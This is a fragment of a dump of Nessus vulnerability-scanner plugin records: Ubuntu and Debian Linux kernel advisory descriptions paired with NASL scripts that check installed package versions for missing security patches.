cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2947-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-35-generic\", pkgver:\"4.2.0-35.40~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-35-generic-lpae\", pkgver:\"4.2.0-35.40~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.2.0-35-lowlatency\", pkgver:\"4.2.0-35.40~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:54", "description": "Ralf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nIt was discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel did not correctly compute branch offsets for backward jumps after ctx expansion. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-2383)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux vulnerabilities (USN-2947-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7833", "CVE-2015-8812", "CVE-2016-2085", "CVE-2016-2383", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2947-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90402", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2947-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90402);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2947-1\");\n\n script_name(english:\"Ubuntu 15.10 : linux vulnerabilities (USN-2947-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ralf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nIt was discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel did not correctly compute branch\noffsets for backward jumps after ctx expansion. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2016-2383)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2947-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2947-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-35-generic\", pkgver:\"4.2.0-35.40\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-35-generic-lpae\", pkgver:\"4.2.0-35.40\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-35-lowlatency\", pkgver:\"4.2.0-35.40\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:12", "description": "Ralf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nIt was discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel did not correctly compute branch offsets for backward jumps after ctx expansion. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-2383)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux-raspi2 vulnerabilities (USN-2947-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7833", "CVE-2015-8812", "CVE-2016-2085", "CVE-2016-2383", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2947-3.NASL", "href": "https://www.tenable.com/plugins/nessus/90404", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2947-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90404);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2947-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerabilities (USN-2947-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ralf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nIt was discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel did not correctly compute branch\noffsets for backward jumps after ctx expansion. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2016-2383)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2947-3/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2947-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1028-raspi2\", pkgver:\"4.2.0-1028.36\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:41:33", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.\n\n - CVE-2018-15471 (XSA-270) Felix Wilhelm of Google Project Zero discovered a flaw in the hash handling of the xen-netback Linux kernel module. A malicious or buggy frontend may cause the (usually privileged) backend to make out of bounds memory accesses, potentially resulting in privilege escalation, denial of service, or information leaks.\n\n - CVE-2018-18021 It was discovered that the KVM subsystem on the arm64 platform does not properly handle the KVM_SET_ON_REG ioctl. An attacker who can create KVM based virtual machines can take advantage of this flaw for denial of service (hypervisor panic) or privilege escalation (arbitrarily redirect the hypervisor flow of control with full register control).", "cvss3": {}, "published": "2018-10-10T00:00:00", "type": "nessus", "title": "Debian DSA-4313-1 : linux - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-15471", "CVE-2018-18021"], "modified": "2022-02-10T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4313.NASL", "href": "https://www.tenable.com/plugins/nessus/118023", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4313. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118023);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/10\");\n\n script_cve_id(\"CVE-2018-15471\", \"CVE-2018-18021\");\n script_xref(name:\"DSA\", value:\"4313\");\n\n script_name(english:\"Debian DSA-4313-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\n - CVE-2018-15471 (XSA-270)\n Felix Wilhelm of Google Project Zero discovered a flaw\n in the hash handling of the xen-netback Linux kernel\n module. A malicious or buggy frontend may cause the\n (usually privileged) backend to make out of bounds\n memory accesses, potentially resulting in privilege\n escalation, denial of service, or information leaks.\n\n - CVE-2018-18021\n It was discovered that the KVM subsystem on the arm64\n platform does not properly handle the KVM_SET_ON_REG\n ioctl. An attacker who can create KVM based virtual\n machines can take advantage of this flaw for denial of\n service (hypervisor panic) or privilege escalation\n (arbitrarily redirect the hypervisor flow of control\n with full register control).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-15471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-18021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4313\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 4.9.110-3+deb9u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-15471\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"hyperv-daemons\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libcpupower-dev\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libcpupower1\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libusbip-dev\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-arm\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-s390\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-compiler-gcc-6-x86\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-cpupower\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-doc-4.9\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-4kc-malta\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-5kc-malta\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-686\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-686-pae\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-amd64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-arm64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-armel\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-armhf\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-i386\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mips\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mips64el\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-mipsel\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-ppc64el\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-all-s390x\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-amd64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-arm64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-armmp\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-armmp-lpae\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-common\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-common-rt\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-loongson-3\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-marvell\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-octeon\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-powerpc64le\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-rt-686-pae\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-rt-amd64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.9.0-9-s390x\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-4kc-malta\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-4kc-malta-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-5kc-malta\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-5kc-malta-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686\", 